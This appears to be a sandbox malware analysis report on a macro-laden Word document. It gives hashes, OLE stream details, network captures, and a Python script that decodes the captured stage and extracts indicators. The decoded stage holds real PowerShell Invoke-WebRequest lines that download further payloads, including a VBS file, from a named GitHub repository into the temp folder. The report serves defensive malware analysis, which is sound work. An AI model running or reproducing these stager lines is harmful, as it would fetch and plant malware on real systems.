                                                                                                                                            SHA-512:32D98F2F022128F67B3DF32680F1E45F3DAE22E7CEF27EEC184E4492A9C19A2C78DF7065D30C7C16A7C1D28558DB23B36D691283521609D16075A3A3B0E0205C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: [folders]..Templates.LNK=0..RfORrHIRNe.LNK=0..[doc]..RfORrHIRNe.LNK=0..
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):162
                                                                                                                                            Entropy (8bit):2.5038355507075254
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                                                            MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                                                            SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                                                            SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                                                            SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8016
                                                                                                                                            Entropy (8bit):3.5802717128210926
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:chQCQMqeqvsqvJCwo5z8hQCQMqeqvsEHyqvJCworXzKAY7H6F2XblUVjA2:cWzo5z8WnHnorXzK6F2XcA2
                                                                                                                                            MD5:672D4FA68A59184E8FA26CBCC685409F
                                                                                                                                            SHA1:B2B0FCDE6711AEFA0F586B6EF5B87555FFDD4CC5
                                                                                                                                            SHA-256:E9474717A3CF6EC83C908F73EBAC809370AC4D9B8740583D72382B2691D01F1E
                                                                                                                                            SHA-512:44E0586F7CAE5564EA7B102B4EB713555242CC027FC1CED03EEB2004D2403584BF8108FF7853B14FA6FCC95F1892C6E75DA0D0DC3099A8A0CE6A22B787BC1E3C
                                                                                                                                            Malicious:false
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A5FROKCO9YHIX8A61MON.temp
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.5802717128210926
Encrypted:false
SSDEEP:96:chQCQMqeqvsqvJCwo5z8hQCQMqeqvsEHyqvJCworXzKAY7H6F2XblUVjA2:cWzo5z8WnHnorXzK6F2XcA2
MD5:672D4FA68A59184E8FA26CBCC685409F
SHA1:B2B0FCDE6711AEFA0F586B6EF5B87555FFDD4CC5
SHA-256:E9474717A3CF6EC83C908F73EBAC809370AC4D9B8740583D72382B2691D01F1E
SHA-512:44E0586F7CAE5564EA7B102B4EB713555242CC027FC1CED03EEB2004D2403584BF8108FF7853B14FA6FCC95F1892C6E75DA0D0DC3099A8A0CE6A22B787BC1E3C
Malicious:false
C:\Users\user\Desktop\~$ORrHIRNe.doc
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.5038355507075254
Encrypted:false
SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:false

Static File Info

General

File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Wed Nov 3 22:06:00 2021, Last Saved Time/Date: Wed Nov 3 22:17:00 2021, Number of Pages: 1, Number of Words: 10, Number of Characters: 61, Security: 0
Entropy (8bit):3.971846508462655
TrID:
• Microsoft Word document (32009/1) 54.23%
• Microsoft Word document (old ver.) (19008/1) 32.20%
• Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:RfORrHIRNe.doc
File size:38912
MD5:955d5d2855b291a3cf1fc6655bbbbb79
SHA1:b58901cf8967310228bc6e4c224b2cfaf014bc65
SHA256:63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8
SHA512:044f7164d30798656cb0f17f1a7ab76cdceb2f6bfb1107f04a6f300d2551459d0804a03db76591a7a10a900fddc8a7da5d9442ec4846709f9c9684e1aaeaf14e
SSDEEP:384:o/MMMOtM1ulwUmDoKdAa8WRGbiSAoKXMVkK54miJ2JLN0jUDt3ou0FeK:o/MMMOtM1ulwU0T1MVkzmM2fxyu0FeK

File Icon

Icon Hash:e4eea2aaa4b4b4a4

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "RfORrHIRNe.doc"

Indicators

Has Summary Info:True
Application Name:Microsoft Office Word
Encrypted Document:False
Contains Word Document Stream:True
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Code Page:1251
Title:
Subject:
Author:Admin
Keywords:
Comments:
Template:Normal.dotm
Last Saved By:Admin
Revision Number:12
Total Edit Time:420
Create Time:2021-11-03 22:06:00
Last Saved Time:2021-11-03 22:17:00
Number of Pages:1
Number of Words:10
Number of Characters:61
Creating Application:Microsoft Office Word
Security:0

Document Summary

Document Code Page:1251
Number of Lines:1
Number of Paragraphs:1
Thumbnail Scaling Desired:False
Company:
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:1048576
Language:

Streams with VBA

VBA File Name: NewMacros.bas, Stream Size: 1428
General
Stream Path:Macros/VBA/NewMacros
VBA File Name:NewMacros.bas
Stream Size:1428
VBA Code
VBA File Name: ThisDocument.cls, Stream Size: 1159
General
Stream Path:Macros/VBA/ThisDocument
VBA File Name:ThisDocument.cls
Stream Size:1159
VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114
General
Stream Path:\x1CompObj
File Type:data
Stream Size:114
Entropy:4.42107393569
Base64 Encoded:True
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:4096
Entropy:0.262838901893
Base64 Encoded:False
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path:\x5SummaryInformation
File Type:data
Stream Size:4096
Entropy:0.460733334731
Base64 Encoded:False
Stream Path: 1Table, File Type: data, Stream Size: 7076
General
Stream Path:1Table
File Type:data
Stream Size:7076
Entropy:5.95668538259
Base64 Encoded:True
Stream Path: Data, File Type: SysEx File - Garfield, Stream Size: 4096
General
Stream Path:Data
File Type:SysEx File - Garfield
Stream Size:4096
Entropy:7.54547746336
Base64 Encoded:False
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 410
General
Stream Path:Macros/PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:410
Entropy:5.39100661112
Base64 Encoded:True
Data ASCII (CRLF rendered as line breaks, truncated as in the report):
ID="{14773D12-36ED-4974-A27E-6C63B7A54110}"
Document=ThisDocument/&H00000000
Module=NewMacros
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="4042E9EFEDEFEDEFEDEFED"
DPB="9C9E351BCD76CE76CE76"
GC="F8FA51A252A2525D"

[HostEx
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71
General
Stream Path: Macros/PROJECTwm
File Type: data
Stream Size: 71
Entropy: 3.34859995248
Base64 Encoded: False
Data ASCII: T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2597
General
Stream Path: Macros/VBA/_VBA_PROJECT
File Type: data
Stream Size: 2597
Entropy: 4.06864016648
Base64 Encoded: False
Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2013
General
Stream Path: Macros/VBA/__SRP_0
File Type: data
Stream Size: 2013
Entropy: 3.60393793372
Base64 Encoded: False
Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 186
General
Stream Path: Macros/VBA/__SRP_1
File Type: data
Stream Size: 186
Entropy: 1.60078147632
Base64 Encoded: False
Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 348
General
Stream Path: Macros/VBA/__SRP_2
File Type: data
Stream Size: 348
Entropy: 1.78667786328
Base64 Encoded: False
Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 106
General
Stream Path: Macros/VBA/__SRP_3
File Type: data
Stream Size: 106
Entropy: 1.35911194617
Base64 Encoded: False
Stream Path: Macros/VBA/__SRP_4, File Type: data, Stream Size: 347
General
Stream Path: Macros/VBA/__SRP_4
File Type: data
Stream Size: 347
Entropy: 2.16838987833
Base64 Encoded: False
Stream Path: Macros/VBA/__SRP_5, File Type: data, Stream Size: 156
General
Stream Path: Macros/VBA/__SRP_5
File Type: data
Stream Size: 156
Entropy: 1.58115335118
Base64 Encoded: False
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 568
General
Stream Path: Macros/VBA/dir
File Type: data
Stream Size: 568
Entropy: 6.29850563159
Base64 Encoded: True
Stream Path: WordDocument, File Type: data, Stream Size: 4096
General
Stream Path: WordDocument
File Type: data
Stream Size: 4096
Entropy: 1.46842568754
Base64 Encoded: False

Network Behavior

Snort IDS Alerts

Timestamp                  | Protocol | SID | Message                                                      | Source Port | Dest Port | Source IP | Dest IP
11/04/21-01:49:49.942100   | UDP      | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53          | 52167     | 8.8.8.8   | 192.168.2.22
11/04/21-01:49:50.024088   | UDP      | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53          | 50591     | 8.8.8.8   | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp                          | Source Port | Dest Port | Source IP       | Dest IP
Nov 4, 2021 01:49:49.958056927 CET | 49165       | 80        | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:49.975087881 CET | 80          | 49165     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:49.975174904 CET | 49165       | 80        | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:49.978108883 CET | 49165       | 80        | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:49.995512962 CET | 80          | 49165     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.025172949 CET | 49166       | 443       | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.025216103 CET | 443         | 49166     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.025315046 CET | 49166       | 443       | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.049352884 CET | 49166       | 443       | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.049386978 CET | 443         | 49166     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.099561930 CET | 443         | 49166     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.100049973 CET | 49166       | 443       | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.109554052 CET | 49166       | 443       | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.109579086 CET | 443         | 49166     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.110059023 CET | 443         | 49166     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.203811884 CET | 49165       | 80        | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.313007116 CET | 49166       | 443       | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.415730000 CET | 49166       | 443       | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.456871033 CET | 443         | 49166     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.550899029 CET | 443         | 49166     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.551024914 CET | 443         | 49166     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.551069021 CET | 49166       | 443       | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.551084042 CET | 443         | 49166     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.551095963 CET | 443         | 49166     | 140.82.121.3    | 192.168.2.22
Nov 4, 2021 01:49:50.551146030 CET | 49166       | 443       | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.554740906 CET | 49166       | 443       | 192.168.2.22    | 140.82.121.3
Nov 4, 2021 01:49:50.577950001 CET | 49167       | 443       | 192.168.2.22    | 185.199.108.133
Nov 4, 2021 01:49:50.577989101 CET | 443         | 49167     | 185.199.108.133 | 192.168.2.22
Nov 4, 2021 01:49:50.578098059 CET | 49167       | 443       | 192.168.2.22    | 185.199.108.133
Nov 4, 2021 01:49:50.578778982 CET | 49167       | 443       | 192.168.2.22    | 185.199.108.133
Nov 4, 2021 01:49:50.578793049 CET | 443         | 49167     | 185.199.108.133 | 192.168.2.22
Nov 4, 2021 01:49:50.622517109 CET | 443         | 49167     | 185.199.108.133 | 192.168.2.22
Nov 4, 2021 01:49:50.622648001 CET | 49167       | 443       | 192.168.2.22    | 185.199.108.133
Nov 4, 2021 01:49:50.635114908 CET | 49167       | 443       | 192.168.2.22    | 185.199.108.133
Nov 4, 2021 01:49:50.635132074 CET | 443         | 49167     | 185.199.108.133 | 192.168.2.22
Nov 4, 2021 01:49:50.635641098 CET | 443         | 49167     | 185.199.108.133 | 192.168.2.22
Nov 4, 2021 01:49:50.651793957 CET | 49167       | 443       | 192.168.2.22    | 185.199.108.133
Nov 4, 2021 01:49:50.692886114 CET | 443         | 49167     | 185.199.108.133 | 192.168.2.22
Nov 4, 2021 01:49:50.812530041 CET | 443         | 49167     | 185.199.108.133 | 192.168.2.22
Nov 4, 2021 01:49:50.812637091 CET | 443         | 49167     | 185.199.108.133 | 192.168.2.22
Nov 4, 2021 01:49:50.812717915 CET | 49167       | 443       | 192.168.2.22    | 185.199.108.133
Nov 4, 2021 01:49:50.813937902 CET | 49167       | 443       | 192.168.2.22    | 185.199.108.133
                                                                                                                                            Nov 4, 2021 01:49:52.633305073 CET4916580192.168.2.22140.82.121.3

                                                                                                                                            UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 4, 2021 01:49:49.920382023 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Nov 4, 2021 01:49:49.942100048 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Nov 4, 2021 01:49:50.002633095 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Nov 4, 2021 01:49:50.024087906 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Nov 4, 2021 01:49:50.558506966 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Nov 4, 2021 01:49:50.577189922 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22

                                                                                                                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 4, 2021 01:49:49.920382023 CET | 192.168.2.22 | 8.8.8.8 | 0xcf68 | Standard query (0) | github.com | A (IP address) | IN (0x0001)
Nov 4, 2021 01:49:50.002633095 CET | 192.168.2.22 | 8.8.8.8 | 0xadab | Standard query (0) | github.com | A (IP address) | IN (0x0001)
Nov 4, 2021 01:49:50.558506966 CET | 192.168.2.22 | 8.8.8.8 | 0xd1cd | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001)

                                                                                                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 4, 2021 01:49:49.942100048 CET | 8.8.8.8 | 192.168.2.22 | 0xcf68 | No error (0) | github.com | - | 140.82.121.3 | A (IP address) | IN (0x0001)
Nov 4, 2021 01:49:50.024087906 CET | 8.8.8.8 | 192.168.2.22 | 0xadab | No error (0) | github.com | - | 140.82.121.3 | A (IP address) | IN (0x0001)
Nov 4, 2021 01:49:50.577189922 CET | 8.8.8.8 | 192.168.2.22 | 0xd1cd | No error (0) | raw.githubusercontent.com | - | 185.199.108.133 | A (IP address) | IN (0x0001)
Nov 4, 2021 01:49:50.577189922 CET | 8.8.8.8 | 192.168.2.22 | 0xd1cd | No error (0) | raw.githubusercontent.com | - | 185.199.109.133 | A (IP address) | IN (0x0001)
Nov 4, 2021 01:49:50.577189922 CET | 8.8.8.8 | 192.168.2.22 | 0xd1cd | No error (0) | raw.githubusercontent.com | - | 185.199.110.133 | A (IP address) | IN (0x0001)
Nov 4, 2021 01:49:50.577189922 CET | 8.8.8.8 | 192.168.2.22 | 0xd1cd | No error (0) | raw.githubusercontent.com | - | 185.199.111.133 | A (IP address) | IN (0x0001)

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • github.com
                                                                                                                                            • raw.githubusercontent.com

                                                                                                                                            HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49166 | 140.82.121.3 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
(TLS session; the decrypted requests and responses are listed under HTTPS Proxied Packets)


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49167 | 185.199.108.133 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
(TLS session; the decrypted requests and responses are listed under HTTPS Proxied Packets)


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49165 | 140.82.121.3 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Nov 4, 2021 01:49:49.978108883 CET | 0 | OUT | GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1
Host: github.com
Connection: Keep-Alive
Nov 4, 2021 01:49:49.995512962 CET | 0 | IN | HTTP/1.1 301 Moved Permanently
Content-Length: 0
Location: https://github.com/ssbb36/stv/raw/main/5.mp3


                                                                                                                                            HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49166 | 140.82.121.3 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2021-11-04 00:49:50 UTC | 0 | OUT | GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1
Host: github.com
Connection: Keep-Alive
2021-11-04 00:49:50 UTC | 0 | IN | HTTP/1.1 302 Found
Server: GitHub.com
Date: Thu, 04 Nov 2021 00:49:50 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Accept-Encoding, Accept, X-Requested-With
permissions-policy: interest-cohort=()
Access-Control-Allow-Origin: https://render.githubusercontent.com https://viewscreen.githubusercontent.com https://notebooks.githubusercontent.com
Location: https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2021-11-04 00:49:50 UTC | 0 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
Data Ascii (truncated in the report): Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
2021-11-04 00:49:50 UTC | 2 | IN | Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 6d 61 69 6e 2f 35 2e 6d 70 33 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <html><body>You are being <a href="https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3">redirected</a>.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49167 | 185.199.108.133 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2021-11-04 00:49:50 UTC | 2 | OUT | GET /ssbb36/stv/main/5.mp3 HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2021-11-04 00:49:50 UTC | 2 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 473
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "c42cd382e5da9f4f09cf49119db08f21ab927655a40c4bf6043e9fbeafdbfa36"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 575C:24AC:9E4121:A4F6C2:61832E2E
Accept-Ranges: bytes
Date: Thu, 04 Nov 2021 00:49:50 GMT
Via: 1.1 varnish
X-Served-By: cache-mxp6940-MXP
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1635986991.659436,VS0,VE145
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 90989139000a6800ba561921d915249b8b2851f4
Expires: Thu, 04 Nov 2021 00:54:50 GMT
Source-Age: 0
2021-11-04 00:49:50 UTC | 3 | IN | Data Raw: 63 64 20 24 45 6e 76 3a 54 65 6d 70 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 32 2e 6d 70 33 22 20 2d 4f 75 74 46 69 6c 65 20 22 74 65 6d 70 35 34 36 38 35 22 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 31 2e 6d 70 33 22 20 2d 4f 75 74 46 69 6c 65 20 22 65 6e 64 2e 76 62 73 22 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 33
Data Ascii (line breaks restored from the 0x0a bytes in the raw dump; the capture is truncated in the report, so the last line is incomplete):
cd $Env:Temp
Invoke-WebRequest -Uri "http://github.com/ssbb36/stv/raw/main/2.mp3" -OutFile "temp54685"
Invoke-WebRequest -Uri "https://github.com/ssbb36/stv/raw/main/1.mp3" -OutFile "end.vbs"
Invoke-WebRequest -Uri "http://github.com/ssbb36/stv/raw/main/3
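The redirect chain recorded in HTTP Packets session 2 and HTTPS Proxied sessions 0 and 1 (plain HTTP to github.com, 301 to HTTPS, 302 to raw.githubusercontent.com, 200 with a text/plain body that is really a PowerShell stage), together with the truncated "Data Raw" dump above, as an added Python example that is not part of the sandbox report. It replays the captured hops to confirm the final URL and flag the hop fetched over plaintext, decodes the hex into the stage (keeping the newlines that the report's "Data Ascii" rendering drops), and pulls the download URLs and output filenames out of it while tolerating the cut-off last line. The hop list and the hex are copied from the report; the function names are this example's own.

```python
import re
from urllib.parse import urlparse

# Body of the 200 OK from raw.githubusercontent.com, copied from the report's
# "Data Raw" field. The report truncates it, so the last line is incomplete.
STAGE_HEX = """
63 64 20 24 45 6e 76 3a 54 65 6d 70 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55
72 69 20 22 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f
72 61 77 2f 6d 61 69 6e 2f 32 2e 6d 70 33 22 20 2d 4f 75 74 46 69 6c 65 20 22 74 65 6d 70 35 34 36
38 35 22 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 73
3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e
2f 31 2e 6d 70 33 22 20 2d 4f 75 74 46 69 6c 65 20 22 65 6e 64 2e 76 62 73 22 0a 49 6e 76 6f 6b 65
2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63
6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 33
"""

# Redirect chain as captured: (request URL, status, Location header or None).
OBSERVED_HOPS = [
    ("http://github.com/ssbb36/stv/raw/main/5.mp3", 301,
     "https://github.com/ssbb36/stv/raw/main/5.mp3"),
    ("https://github.com/ssbb36/stv/raw/main/5.mp3", 302,
     "https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3"),
    ("https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3", 200, None),
]
REDIRECTS = {301, 302, 303, 307, 308}


def follow_redirects(hops):
    """Walk the captured hops, checking each Location is what was requested next.

    Returns the visited chain, the final URL and every hop fetched over plain
    HTTP. The stager's first request is one: anything between the victim and
    github.com could have answered that request with its own Location header.
    """
    chain, plaintext = [], []
    for i, (url, status, location) in enumerate(hops):
        chain.append(url)
        if urlparse(url).scheme == "http":
            plaintext.append(url)
        if status in REDIRECTS:
            nxt = hops[i + 1][0] if i + 1 < len(hops) else None
            if location is None or nxt != location:
                raise ValueError(f"hop {i}: {status} with Location {location!r} "
                                 f"was not followed by a request for it")
        elif status == 200:
            break
        else:
            raise ValueError(f"hop {i}: unexpected status {status}")
    return {"chain": chain, "final": chain[-1], "plaintext_hops": plaintext}


def decode_stage(hex_dump):
    """Turn the report's space-separated hex into text, keeping the 0x0a newlines."""
    return bytes.fromhex(hex_dump).decode("utf-8")


def extract_iocs(script):
    """Collect (URL, OutFile) pairs from Invoke-WebRequest lines, marking a cut-off line."""
    iocs = []
    for line in script.splitlines():
        m = re.search(r'Invoke-WebRequest\s+-Uri\s+"([^"]*)("?)', line, re.I)
        if not m:
            continue
        url, closed = m.group(1), m.group(2) == '"'
        out = re.search(r'-OutFile\s+"([^"]+)"', line, re.I)
        parsed = urlparse(url)
        iocs.append({
            "url": url,
            "scheme": parsed.scheme,
            "host": parsed.hostname,
            "outfile": out.group(1) if out else None,
            "truncated": not closed,  # the report cut the capture mid-line
        })
    return iocs


if __name__ == "__main__":
    print(follow_redirects(OBSERVED_HOPS))
    stage = decode_stage(STAGE_HEX)
    print(stage)
    for ioc in extract_iocs(stage):
        print(ioc)
```

Two things the output makes visible that the flattened report does not: the stage itself mixes http:// and https:// for the same host, so the second-stage fetches are as exposed to tampering as the first one, and only two of the three OutFile targets (temp54685 and end.vbs) are recoverable from what the sandbox captured.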


                                                                                                                                            Code Manipulations

                                                                                                                                            Statistics

                                                                                                                                            Behavior


                                                                                                                                            System Behavior

                                                                                                                                            General

Start time: 01:49:15
Start date: 04/11/2021
